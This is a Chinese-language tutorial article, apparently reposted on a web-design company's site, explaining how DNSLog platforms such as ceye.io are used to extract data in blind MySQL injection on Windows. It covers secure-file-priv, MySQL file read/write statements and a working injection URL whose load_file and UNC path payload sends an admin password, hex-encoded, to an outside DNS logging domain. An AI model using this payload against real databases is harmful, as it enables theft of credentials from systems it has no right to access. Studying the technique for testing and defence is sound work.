DNSLog在MySQL注入中的方法是什么

这篇文章主要介绍“DNSLog在MySQL注入中的方法是什么”,在日常操作中,相信很多人在DNSLog在MySQL注入中的方法是什么问题上存在疑惑,小编查阅了各式资料,整理出简单好用的操作方法,希望对大家解答”DNSLog在MySQL注入中的方法是什么”的疑惑有所帮助!接下来,请跟着小编一起来学习吧!

十堰网站制作公司哪家好,找创新互联!从网页设计、网站建设、微信开发、APP开发、成都响应式网站建设等网站项目制作,到程序开发,运营维护。创新互联成立与2013年到现在10年的时间,我们拥有了丰富的建站经验和运维经验,来保证我们的工作的顺利进行。专注于网站建设就选创新互联。

关于DNSlog在Web攻击的利用

简单理解就是在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起DNS请求,这个时候可以通过DNSlog这种方式把想获得的数据外带出来。

常用在哪些情况下

  1. SQL注入中的盲注

  2. 无回显的命令执行

  3. 无回显的SSRF

DNSlog攻击的基本原理

DNSLog在MySQL注入中的方法是什么

作为攻击者,提交注入语句,让数据库把需要查询的值和域名拼接起来,然后发生DNS查询,我们只要能获得DNS日志,就得到了想要的值。所以我们需要有一个自己的域名,然后再域名商处配置一条NS记录,然后我们在NS服务器上获取DNS日志即可。

DNSLOG在MySQL数据库中SQL注入的实战

本次演示一个最常见的注入场景,就是WHERE后面条件处的注入。实验环境有一个test_user表,三个字段id、user、pass。如下

iduserpass
1adminadmin123

最后就不再自己搭建一个DNS服务器了,直接用ceye.io这个平台,这个平台就集成了Dnslog的功能。

需要条件

  1. MySQL开启load_file()

  2. DNSLog平台(hyuga、CEYE)

  3. Windows平台

Mysql服务端文件读写

条件:服务端配置可读写目录和正确的用户权限。

安全保护

mysql服务端的文件读取有很多的条件限制,主要是mysql数据库的配置,为了安全原因,当读取位于服务器上的文本文件时,文件必须处于数据库目录可被所有人读取。你可以通过执行show variables like '%secure%'来查看。

secure-file-priv参数是用来限制LOAD DATA,SELECT ... OUTFILE,DUMPFILELOAD_FILE()可以操作的文件夹。

secure-file-priv的值可以分为三种情况:

  1. secure-file-priv的值为null,表示显示mysqld不允许导入|导出

  2. secure-file-priv的值为/tmp/,表示限制mysqld的导入|导出只能发生在/tmp/目录下,此时如果读写发生在其他文件夹中,就会报错

  3. secure-file-priv的值没有具体值,表示不对mysqld的导入|导出做限制。

除此之外,读取或写入文件必须拥有可操作的用户权限否则会报错。

ERROR 1045 (28000): Access denied for user

读取文件

SELECT LOAD_FILE('/var/lib/mysql-files/aaa') AS Result;
create database test;
create table test (id TEXT, content TEXT);
load data infile "/var/lib/mysql-files/aaa" into table test.test FIELDS TERMINATED BY '\n\r';

写入文件

select group_concat(id) from test INTO DUMPFILE "/var/lib/mysql-files/aaaaa";

load_file

MySQL应该是在实战中利用DNSLOG最多的。

在MySQL中,有一个load_file函数可以用来读取本地的文件。

http://127.0.0.1/mysql.php?id=1 union select 1,2,load_file(concat('\\\\',(SELECT hex(pass) FROM test.test_user WHERE user='admin' LIMIT 1),'.mysql.nk40ci.ceye.io\\abc'))

可以看到test_user中的pass字段的值的Hex码就被查询出来了,为什么这个地方Hex编码的目的就是减少干扰,因为很多时候数据库字段的值可能是有特殊符号的,这些特殊符号拼接在域名里是无法做DNS查询的,因为域名有一定的规范,有些特殊符号是不能带入的。

注意:load_file函数再Linux下是无法用来做DNSLOG攻击的,因为这里就涉及到Windows的UNC路径。

UNC路径

百度的UNC路径的解释

UNC是一种命名惯例, 主要用于在Microsoft Windows上指定和映射网络驱动器. UNC命名惯例最多被应用于在局域网中访问文件服务器或者打印机。我们日常常用的网络共享文件就是这个方式。

其实我们平常在Windows中用共享文件的时候就会用到这种网络地址的形式

\\sss.xxx\test\

这也就解释了为什么CONCAT()函数拼接了4个\了,因为转义的原因,4个\就变成了2个\,目的就是利用UNC路径。

因为Linux没有UNC路径这个东西,所以当MySQL处理Linux系统中的时候,是不能用这种方式外带数据的。

到此,关于“DNSLog在MySQL注入中的方法是什么”的学习就结束了,希望能够解决大家的疑惑。理论与实践的搭配能更好的帮助大家学习,快去试试吧!若想继续学习更多相关知识,请继续关注创新互联网站,小编会继续努力为大家带来更多实用的文章!


网页名称:DNSLog在MySQL注入中的方法是什么
网站链接:http://myzitong.com/article/gjdcei.html